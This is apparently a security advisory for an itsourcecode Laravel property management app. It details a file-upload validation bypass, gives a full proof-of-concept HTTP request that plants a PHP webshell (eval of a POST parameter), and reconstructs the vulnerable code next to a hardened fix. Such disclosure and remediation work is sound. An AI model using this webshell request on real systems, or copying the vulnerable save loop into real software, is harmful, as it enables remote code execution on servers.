itsourcecode
Laravel Property Management System
V1.0
https://itsourcecode.com/wp-content/uploads/2021/10/Property-Management-System-Laravel.zip
FileUpload
In the PropertiesController.php controller, the upload method is used to upload images. However, the image validation rule in the UpdatePropertiesRequest class only applies to one form field and can be bypassed, so an authenticated attacker can upload a webshell directly.
- Visit the backend "/admin/properties/create" page to upload a picture. The upload is handled by the update method of the app/Http/Controllers/Admin/PropertiesController.php controller.
- The validation for this upload lives in the rules() method of the UpdatePropertiesRequest class: the file passed in the photo field must be an image. That rule itself is fine. The problem is that the saveFiles() method does not read the file from the validated photo field; it iterates over the request keys and saves every key for which "$request->hasFile($key)" is true. The attacker can therefore submit the file under any other field name, and it is stored with its original filename and no image check applied.
Note that in the multipart form data below, the field name="photo" has been changed to name="file"; everything else is a normal property creation request.
POST /admin/properties HTTP/1.1
Host: <host:port>
Content-Length: 862
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.17.22:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5jIWWI3hIJsIxXKJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.17.22:8000/admin/properties/create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: <change cookies>
Connection: close

------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="_token"

XabMXjldHui8xdksPHFAvs6FdhR8vPvdZyVMMnpx
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="name"

mirage
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="address"

aaaa
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/png

GIF89a
<?php eval($_POST["cmd"]);?>
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="photo_max_size"

2
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="photo_max_width"

4096
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="photo_max_height"

4096
------WebKitFormBoundary5jIWWI3hIJsIxXKJ--
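The following is an added illustrative example and is not code from the itsourcecode project. It reconstructs the pattern described above, a FormRequest rule bound to the photo field while saveFiles() stores every uploaded field under its client-supplied name, and places a hardened replacement next to it. The class name PropertyImageUpload, the method names saveFilesVulnerable()/saveFilesHardened(), the target directory, and the availability of the GD extension are assumptions made for the example.

```php
<?php
// Added illustrative example; NOT the itsourcecode project's own code.
// Reconstructs the advisory's pattern (validation bound to "photo", save loop
// accepting any uploaded field) and shows a hardened replacement. Class name,
// method names, target directory and use of the GD extension are assumptions.

namespace App\Http\Controllers\Admin;

use Illuminate\Http\File;
use Illuminate\Http\Request;
use Illuminate\Http\UploadedFile;
use Illuminate\Support\Facades\Storage;
use Illuminate\Support\Str;

class PropertyImageUpload
{
    // Vulnerable pattern (reconstructed). The FormRequest only validates the key
    // "photo", but $request->all() also contains uploaded files, so this loop
    // picks up name="file" as well and writes it under the client filename.
    // With the request above that is public/<dir>/shell.php.
    public function saveFilesVulnerable(Request $request, string $dir): array
    {
        $saved = [];
        foreach (array_keys($request->all()) as $key) {
            if ($request->hasFile($key)) {
                $file = $request->file($key);
                $file->move(public_path($dir), $file->getClientOriginalName());
                $saved[] = $dir . '/' . $file->getClientOriginalName();
            }
        }
        return $saved;
    }

    // Hardened version: read only the validated field, verify the content
    // server-side, discard the client filename/extension, and store the result
    // outside the web root.
    public function saveFilesHardened(Request $request, string $dir): ?string
    {
        // "image"/"mimes" check the MIME type guessed from the file content, so a
        // polyglot such as "GIF89a<?php ..." can still pass this step; the
        // re-encode below is what actually neutralises it.
        $request->validate([
            'photo' => ['required', 'file', 'image', 'mimes:jpg,jpeg,png,gif', 'max:2048'],
        ]);

        $file = $request->file('photo');
        if (!$file instanceof UploadedFile || !$file->isValid()) {
            return null;
        }

        // Decode with GD (assumed installed); anything that is not a real,
        // complete image fails here.
        $img = @imagecreatefromstring((string) file_get_contents($file->getRealPath()));
        if ($img === false) {
            return null;
        }

        // Re-encode to PNG in a temp file: drops embedded payloads (PHP tags,
        // EXIF, trailing data) and the attacker-controlled extension.
        $tmp = tempnam(sys_get_temp_dir(), 'img');
        imagepng($img, $tmp);
        imagedestroy($img);

        // Server-chosen random name; the "local" disk is storage/app, which the
        // web server does not serve (and must not execute PHP from).
        $name = Str::random(40) . '.png';
        $path = Storage::disk('local')->putFileAs($dir, new File($tmp), $name);
        @unlink($tmp);

        return $path === false ? null : $path;
    }
}
```

The hardened method fixes the three independent defects the bypass relies on: it reads only the field the FormRequest validated, it trusts neither the Content-Type part header nor the client filename, and it never writes a client-chosen name into a directory the web server executes PHP from. Serving the stored image back through a controller (or a disk with no script execution) closes the remaining gap even if a future field is added to the form.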